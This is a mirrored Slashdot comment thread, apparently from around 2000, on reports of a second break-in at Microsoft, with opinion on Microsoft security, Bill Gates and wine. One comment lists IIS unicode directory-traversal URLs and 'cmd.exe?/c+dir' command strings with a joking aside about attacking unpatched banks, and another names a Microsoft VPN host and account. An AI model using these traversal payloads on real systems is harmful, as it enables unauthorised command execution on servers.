Slashdot Mirror
Microsoft Cracked again?
Dominic writes: "Seems microsoft have been hacked (possibly) again, acording to infoworld."
They don't seem to have a lot of evidence, but there's some interesting commentary related to this, and the earlier crack where the source code to Windows and Office was supposedly stolen (I'll believe that when I see it).
It seems that with these hacks Microsoft is losing more than their renound ability to market and spin themselves around. Usually their Marketing does all the work and the technical side of their product is kept to a whisper. But now with these hacks their Admins are admitting their faults and it seems the marketing is coming back to "clarify" things so we the public don't panic.
Let me guess... A few days from now the story will be cleared up as a minor breach and that no data was modified nor seen...
fslg503-985-8686503-985-8686503-985-8686503-985-8
Too often on here I see the ignoramus posting about the evils of microsoft and Gates. I think its the same thing as penis envy...he's rich, he's got an amazingly successful company..and you dont. I'm no fan of the software quality myself, but I wont go about spouting how the CEO is evil. Thats just immature. I think Gates has proven himself a worthy human with all his donations. At least he's doing more than those other tech people who claim that computers can solve everything. You need to be able to eat decent food and clean water before you need a SystemTech PentiumProThlon 9000 w/ advanced graphics capabilities and altec lansing speakers. You need to solve starvation before planting a laptop in the hands of the poor.
-
> I haxored kernel.org and downloaded the linux source code
That's nothing. I downloaded it, changed some things, and uploaded the changes!
I even put my name in the files, so anyone else who downloads it will know I did it!
Sheesh, evil *and* a jerk. -- Jade
"...The[y] triage each attack and deal with those that actually form a real threat to the organisation..."
Even the most self-serving accounts of the previous crack says that the crackers were in for twelve days. M$ spun the story to say that they were watching the whole time; I don't believe that. Now *you* want us to believe that M$'s response team really focuses on attacks "...that actually form a real threat to the organization..."
Nuts. They flat didn't even know the first one was happening for 'way too long.
"...They also conduct internal tiger team attacks to ensure they know about the holes before attackers do..."
That's all real fine-and-dandy for the hard-core threats -- but every account I've read says that M$ was compromised by an email attachment that:
"Tiger teams"?
"Tiger teams" aren't going to do M$ any good; it's their own software and their own arrogance that did them in.
To let you continue:
"...Hopefully, you'll understand why most companies, including banks, are extremely reluctant to share information with the law enforcement agencies..."
No, I don't, particularily given your outlandish rationalization:
"...One simple little attack might take a company's value through the floor because investors don't understand the hoopla surrounding a security incident..."
"One simple little attack..."?
Hoopla?
That's what any shareholder concern boils down to? God forbid that a company's shares fall in price because they can't manage to implement a comprehensive security system.
And let's not worry the silly little investors about such trivia.
"Hey! They invested in our company. How smart can they be?"
t_t_b
--
I think not; therefore I ain't®
I'm on PJ's "enemies" list! Are you?
Your subject title is actually a very good answer to your question. Microsofts security system is not entirely Windows based - if you recall an aticle entitled `Unix at the Empire' a few months ago, or talk to those who have knowledge of MS internal security, there is a lot of ipfilter based OpenBSD firewalls.
Though, as Microsoft are often in the habit of eating their own dog food, they might beusing their new Internet Security and Acceleration [ISA} Server, the replacement to shitty old proxy server. This eliminates much of the nastiness [and non-firewallness] of PS, and is about -3 months old. This incident would damage the launch severely is MS told anyone what they were using.
I'd suspect, with regards to security, they do the testing in a closed environment for quite some time.
But your point is nevertheless a good one - while we don't know what MS use internally, the habit of people calling Outlook Viruses `email viruses', when they only affect a specific client, is misleading.
Sorry- having an open mind is great so long as your brain doesn't fall out. I think you've been spun. The guy's still the primary personality behind the totally unacceptable behavior of Microsoft, which has been _convicted_ of monopolistic crimes, the list of which is so long it'll make your head spin. Did they just do this at random? No, there was a pattern of 'search and destroy' and open attack of the capitalistic process coming right from the top there.
If tossing a few nickels at charity can really make you forget that, you have a _short_ memory.
What I do not understand is why so many people try to crack Microsoft itself. Yes, sure, you wave your manhood for everybody to admire its size, but...
... in the meantime you help actively to make the Microsoft-site the best-protected site in the world. Do you want that?
So mess with the customers of Microsoft as much as you want, embarass them for the whole world, but leave Microsoft itself alone! There may come a time when it is desperately necessary to break into the Microsoft stronghold and *then* you want all those exploits wide open; not plugged.
I know that you don't need the source code to find buffer overflows. I also know that of 1000 people who can find a buffer overflow by examining the source code, maybe 2 or 3 know how to use SoftICE or IDA to find the same exploit by working on the binary. So basically, although you are correct in that you don't need the source code, it makes it much more difficult for the average script kiddie to find it, and thus less likely that it will become public knowledge.
Most sites are cracked by exploting a script (perl, c, php) that resides on the server. And sometimes there is just human error, like forgetting to change a default password (*cough* slashdot *cough*)
Read this:9 03,393015,00.html
http://www.observer.co.uk/international/story/0,6
This single article reversed 180 degrees my opinion of Mr. Gates.
I previously believed him to be a greedy, naieve, power-hungry egomaniac. If this article is accurate, and he will be giving away his money for food and medicine instead of for computers (which are pretty useless if you don't have anything to eat) then maybe slashdot should look into not portraying his as such an evil person. Maybe he has finally matured?
(I know this goes completely against the conventional wisdom on Slashdot, but read the article, maybe submit it as a story here... show that even geeks can be open-minded)
Open Source, Closed Minds. We are Slashdot.
Reality has a liberal bias
From a local paper: ... network security consultant and expert on hackers, said that if a copy of the code was downloaded, the person who seized it may demand a ransom for its safe return. Or if the attacker was an "open-source vigilante," the hacker might release it on the Internet for everyone to enjoy.
"They believe information wants to be free," he said. "And that Microsoft is the big, evil empire."
A
That's funny, dammit!
The moderator who modded the above post as "Troll" must be whacked with a cluestick, please!
Quidquid latine dictum sit, altum viditur.
I only post comments when someone on the internet is wrong.
This is a hoax. The reason behind it was that Bill Gates watched "Charlie's Angel" yesterday...
Bill went home and started calling every Charlie on the phone book to hire angels.
(red herring: l0pht is incorrectly spelled "l0ft" in the article)
Shouldn't l0phtcrack be just as "illegal" regarding Microsoft SAM encrypted password files as DeCSS is to DVDs?
Speak truth to power.
"It's hard to give you an absolute certainty that the patch had been applied across the board. Given today's incident, our security teams are going back to check out the systems."
This statement is particularly disheartening. When the problems with Microsoft Outlook Express and the "features" that allow virus's to spread have their only fix with these Patches, and that -- according to even Microsoft -- its hard to make sure that the patches our applied completely: we should worry.
One might say that the little Microsoft Accessories should have been coded correctly the first time (before being published) but that is often a very hard thing to do.
I am asking You All: What ways could we make sure that "patches" had been applied across the board?
We know that no web server is immune to being cracked. Not because it's a Microsoft web server that it should be immune. They're using the same software as the other big web sites that have been cracked.
Think like a man of action, act like a man of thought.
Color me paranoid but I think microsoft is up
to no good....Hacked twice in a couple of weeks?
AdFuel
________
OT and all but don't use wu-ftpd, if they have problems(not really an if) use ProFTPd or something else.
--
And now they will release "Windows RT 2000 Secure Edition"
RT - Russian Technology
--
1% APY, No fees, Online Bank https://captl1.co/2uIErYq Don't let your $$$ sit in a no-interest acct.
I was given a copy of a small log that Dimitri shared with the IDG reporter. Egg.microsoft.com was not one of the servers mentioned.
And yes, the exploit was nearly identical to one of the lines you mentioned above.
(The IDG reporter said I couldn't share the log, sorry. Though it's possible that restriction might be gone now that the story has been published. The Infoworld story is a reprint of the IDG story that broke on Friday. Strangely enough, I didn't actually say the first sentence attributed to me in the article.)
I've seen this so called hacker on a Dutch television show and he's more then pathetic. When security and such were a bit more popular he got invited to a television show in which he would show how easy it was to hack a website. The site being targeted was www.voetbal.nl. Like I said it was more then pathetic; he claimed that he hacked it (during a commercial break) and when he wanted to show it it wasn't able to anymore. "They changed the password", he said. Yeah right; at 22:00 on a sunday someone is still working and immediatly changed the password in, say, 5 min. No, this is just your regular hacker wannabe who will try anything to "ride a wave" in order to get his name mentioned. Rememeber; "it doesn't matter how you talk about them as long as you are talking about them".
If the exploit is sufficienly high priority (and -- not to dig at Microsoft -- most Microsoft patches are high priority because of the length of time they take to release them and the likelihood that a real-world exploit already exists for them) there is only one way to be sure. Shut down access to everything that doesn't have it yet, and only bring it back online when it does.
--
It's rare that you're presented with a knob whose only two positions are Make History and Flee Your Glorious Destiny.
Unfortunately, persuant to subparagraph J of section 3, chapter 13 of the Microsoft end-user license agreement (EULA), Microsoft reserves the right to terminate any user who comes in contact with the Windows source code.
If you do recieve the code via email or any other means, you are required to unplug your computer, telephone, and television, close your eyes, cover your ears, and chant "la la la, I can't hear you". Failure to comply with these provisions that protect our intellectual property is a violation of the DMCA, and will result in the MS Death-Commando(tm) being dispatched to your location.
We reserve the right to take legal action against anyone who has seen the aforementioned code, anyone who assisted in the theft of the code, anyone who made funny remarks about our IP protection measures, and anyone who found said illegal statements humourous. Stop lauging, we mean it
0 1 - just my two bits
As long as humans are designing software, it's going to reach a complexity where not all use-cases can be considered. Therefore, there is the highest chance that some flaw will creep in. And then, since the number of people trying to discover that flaw in order to abuse it is always going to exceed the number of people looking for flaws to fix, the situation will continue. We've had say, 20 years of cracking - no reason to assume it's going to stop now.
--Remove SPAM from my address to mail me
I realize that this is somewhat inflammatory, but I feel like it should be asked. I am not a programmer, and have the utmost respect for anyone who is capable of writing something like wine, but: Is that really a loss to the Free Software community? Is there any real use for wine except to run proprietary software under Linux? Does this not further our addiction to proprietary software (most notably that heinosity known as "Office") by reducing the imperative to create Free alternatives? Does this not endanger Free alternatives by extending the marketshare of proprietary applications (in that, Office users can now legitimately carp to Linux users that all work should be done in Office since it runs on wine)?
I do not have a signature
I am being serious here, but at the same time, I know that I am being paranoid.
Microsoft has ties with several people in the government. Good ties. Friendships, so to speak. All of these recent hacker attempts seem a little fishy to me. Why all of the publicity, all of a sudden? Why the big stink?
The USA government wants to pass even more restrictive internet and computer laws... laws which will be passed in the name of security, yet at the same time, killing our necessary personal freedoms - our rights.
Bush and Bill are buddy buddy. Microsoft will hold out on seeing the Supreme Court until Bush has become prez and has appointed new Justices. Microsoft will get a slap on the wrist. Our government will then apply god awful amounts of regulation to the computer industry...
So, yes I am being paranoid, but it all seems so obvious to me. Lets just hope that I am wrong, and next year, I am NOT saying "I told you so."
Is that supposed to be sarcastic?
.sig ya clam
Try reading my
Muslim community leaders warn of backlash from tomorrow morning's terrorist attack.
When they were "cracked" last week, the stock rose a few bucks. Of course they go cracked again!
What is a very good way for M$ to stop wine, or at least discourage people from working on it? Create a situation where they can feasibly claim that code in it just might be stolen or that the people who wrote it had access to Windows source code. Whether they did or not is irrelevant, the fact that you can cause legal problems for them simply based on the idea that they might have is what matters. If I were a ruthless organization bent on world domination (like microsoft or $cientology), this is exactly what I would do.
Expect to see legal roadblocks in the future for wine.
Lee
Muslim community leaders warn of backlash from tomorrow morning's terrorist attack.
As I understand it, UCITA allows software companies to remotely disable software (almost) at will. If companies go for this (well they got the law passed for a reason), this could mean that hacking into a company such as M$ would give access to the programs / codes / whatever to shut down any of that company's software on any customer's site (assuming they're connected to the net).
Now that would be scary.
I bet the politicians behind UCITA didn't think of that.
Notice how no news agency that has reported the recent cracks has equated the security flaws in Microsoft's network and servers to Microsft's Windows operating system. No news agency is suggesting that "if you use windows, you could be next", as they often do with other reports. "Man dead after drinking poisoned orange juice... Find out if your orange juice could be poisoned - tonight at 10." Why is it that the news media is not running their usual tricks to scare the populus. In my (not ever humble) opinion, everyone running Windows is running the risk of their network/servers being cracked.
-------
Oh shit! I forgot to click "Post Anonymously"...
Microsoft's internal network is made up of many seperate domains (and Active Directory forests). The Houston domain used exclusively for Microsoft's online properties (MSN.com, Microsoft.com, etc...) and has no privledges to Microsoft's primary domain, REDMOND.
BTW: You can PPTP into Microsoft at cxn-redmond.microsoft.com. (However, they took it down recently because of these security problems.) Username: REDMOND\billg; Password: ????
President Clinton could not be reached for comment, but Governor and Presidential candidate George W. Bush said "that's the way the cookie jar crumbles." No, we don't know what he was talking about either.
Jeff
He doesn't want to believe he threw his money away on garbage.
MS has no incentive in the marketplace to improve their software. Maybe bringing it home to them, by showing them how bad their security is, will force them to make a better product. I doubt it though.
I worked in a bike shop for a few years. One man kept bringing in his bike to repair flats. He had about ten patches on his tires. It would have been cheaper to buy a heavy-duty inner tube and thorn scrapers, than to have it repaired over and over again, but he kept that leaky old inner tube.
photosMy Photostream
Free software is limited by one important issue, who is going to do the coding and who is going to use the product coded? The vast majority of free software is created by people because they use it themselves. But there are also other areas where the people who have the talent to write the code have no interest in using the end product. Here proprietary solutions will continue to dominate.
/citrix metaframe style system.
I don't know about you, but I really don't care whether my word processor is freeware or commercial. I want the underlying operating system to be free, or at least have all its specs published in full. Linux is great not so much because it is free of charge, but because there aren't any secrets about it. With windows there are lots of secrets. With the MacOS there are even more. But with Linux everything is right there on the table and its got a complete development environment included to boot! Talk about a hackers (!cracker) dream come true!
In short, the open source/free software model is one that works in some areas. It does not work for all. Therefore it is not going to take over the world. Twenty years from now commercial software will be just as prevalent as it is right now, if not more prevalent. There is every chance that free software might not be successful in the long run. There is also every chance that it will be successful. But there is nearly zero chance that it will overtake every other development model.
I personally think wine is the greatest thing since Linux itself. Imagine a terminal server type system based off wine? M$'s own terminal server is severly limited by the poor multi-user performance of NT. Unlike Linux and virtually any other version of Unix, it is very easy for a single user to eat up all the resources and lock out everyone else. This is a serious problem, but one that wine does not share. It wouldn't be too hard to make wine into one kick ass terminal server
I'm looking forward to bigger and better things from wine.
Lee
Muslim community leaders warn of backlash from tomorrow morning's terrorist attack.
They did not actually switch to Solaris - they use NT for the front-end servers off an Oracle back-end database running a Sun Solaris server.
The reason is that they find it easier to do rapid application development on the Windows machines. So in theory they can keep their back-end solid via Unix while having the development tools on an easily mastered platform.
Personally, I think running the whole thing on Solaris would have been easier, but that is/was their rationale.
D
----
MS server software is, out of the box, full of security holes and downright dangerous to put on the Net without extensively patching them first, and
In the past, I had to keep up on patching default Mandrake Linux 7.0 installs just to make sure that I didn't get owned by a wu-ftpd site-exec kiddie. Installing any OS requires keeping on top of things when you admin a server(s)... Micro$~1 makes sure that you have more to do to keep your servers "secure"
First thing I do after installing any Os is find any security info I can and apply the related fixes.
One future, two choices. Oppose them or let them destroy us.
This real impact here is what this does to MS as a service vendor. At a time when system software is quickly joining hardware in the "commodity" category, services are becoming ever more important to companies as a revenue source. If MS can't even secure their own servers, how can they possibly claim to be able to do so for clients?
I am willing to bet this "hacker" owned egg.microsoft.com, which was not patched. It took them a few days to take it down and it still is offline.
/ cmd.exe?/c+dir
/ cmd.exe?/c+dir
/ cmd.exe?/c+dir
/ cmd.exe?/c+dir
/ cmd.exe?/c+dir
/ cmd.exe?/c+dir
/ cmd.exe?/c+dir
He was not a "hacker" he just created one of the unicode urls that got parsed incorrectly by IIS. No skill.
http://target/scripts/..%c1%1c../winnt/system32
http://target/scripts/..%c0%9v../winnt/system32
http://target/scripts/..%c0%af../winnt/system32
http://target/scripts/..%c0%qf../winnt/system32
http://target/scripts/..%c1%8s../winnt/system32
http://target/scripts/..%c1%9c../winnt/system32
http://target/scripts/..%c1%pc../winnt/system32
Ok, now kids, don't go owning any banks running IIS today (Most are not patched)!
Ever need an online dictionary?
Steve Mann who is a prof at UofT (Toronto) teaches hardware engineering and wearable computers noted that any MS Windows is a toy operating system. The guy only deals with Unix though.
You can't handle the truth.
That's not quite true, though. One additional, and very important, thing that you can do is to try to figure out how to minimize the damage that an attacker can do even if he does manage to crack something. This is an area in which Unix/Linux and NT both fall down pretty badly; they spend a lot of time trying to make it hard to get priviledge, but let you do pretty much anything you want if you do. There needs to be a lot more attention paid to making systems damage tolerant, so that a broken ftpd (or whatever) won't put the whole system at risk.
There's no point in questioning authority if you aren't going to listen to the answers.
I tried this exploit against one of MY OWN MACHINES. As in, a machine that is owned by me, on which I already know the Admin password etc.
/c dir command like x-empt suggested and the result was the expected.
The first thing I tried was the cmd.exe
Then I pcanywhered in and decided to see if I remote launched notepad if it would appear on the display. When notepad.exe was launched, the whole system crumbled. I tried to kill it, but it won't die. Task Manager just says "Access Denied". Geez, where's kill -9 when you need it. I'm even logged in as admin. I can't kill the process, and I can't start anything except task manager. Can't even launch the services panel to kill IIS.
So now I'm attempting the tried and true method of fixing a win box.
...is at risk of being cracked.
Connect your computer to the internet. Allow it to accept any connection of any sort, ever, from anyone.
Congratulations. You're now at risk of being cracked.
All you can do now is neurotically, obsessively, try to think of every situation in which this cracking could happen, and try and cover it. Then ask all your friends, enemies, and family pets to tell you what you missed.
You're still going to get cracked one day, if enough people try, and enough people care. System administration is more about making this cracking difficult to the point of it not being worth it, rather than ruling it out altogether.
--Remove SPAM from my address to mail me
You are assuming script-kiddies need the source code to find out vulnerabilities in software, but the truth is, if they were able to understand the design intrincacies of software they would not be script-kiddies.
Believe me, for those of us who are competent enough to choose between building or destroying, it's much more rewarding to be creative.
We all know that most people here on ./ enjoys a good M$ bashing when they get the chance. Sometimes the subject are a bit questionable and not really good material for it. But if the article are correct, then they have really asked for it this time. :-) :-)
Now for mine. A company that size with so many users depending on them, have a huge reasonability in keeping this from not happening. When it happened the first time, they should have the resources to make sure that it doesn't happen again. Don't tell me they can't divert the manpower needed to solve this. Let's see the list of posts grow as usual, can we go past 500.
[extreme bashing on]If they cant secure their own network based on their own products who can.[extreme bashing off]. ah felt good.
But somehow I doubt that it will affect anyone's decision about running their software. No impact at boss level, I'm afraid.
--------
I haxored kernel.org and downloaded the linux source code
1) MS server software is, out of the box, full of security holes and downright dangerous to put on the Net without extensively patching them first, and
2) Patching them won't even help you, because there are too many patches and too many holes. So many, in fact, that even MS can't keep up with them, even though the patches are developed and tested in the same building.
Did I miss anything?
> Call it embarrassment, call it publicity, but please don't call it unadulterated altruism.
Err, I don't think that my words implied that Billg was an example of ``unadulterated altruism". If being a limousine liberal was identical to pure unadulterated altruism, then we'd be giving Sally Struthers, spokeswoman for the ``Save the Children" foundation the Nobel Peace Prize, rather than Mother Teresa.
Then again, even if ``a lot of the donating that he does comes with the proviso that his name is loudly involved, I'll admit for sake of fairness that it's more than some of his peers are doing. Will we ever see the ``Larry Ellison Home for Battered Women"? Or even an ``Andrew Grove Foundation for Judaic Studies"?
So far, all I've seen created is Paul Allen's temple to Jimi Hendrix, & I'm still not convinced that even that is a good thing.
Geoff
I think I see a trend here. Maybe for them it really would be easier to muzzle the entire internet than to produce p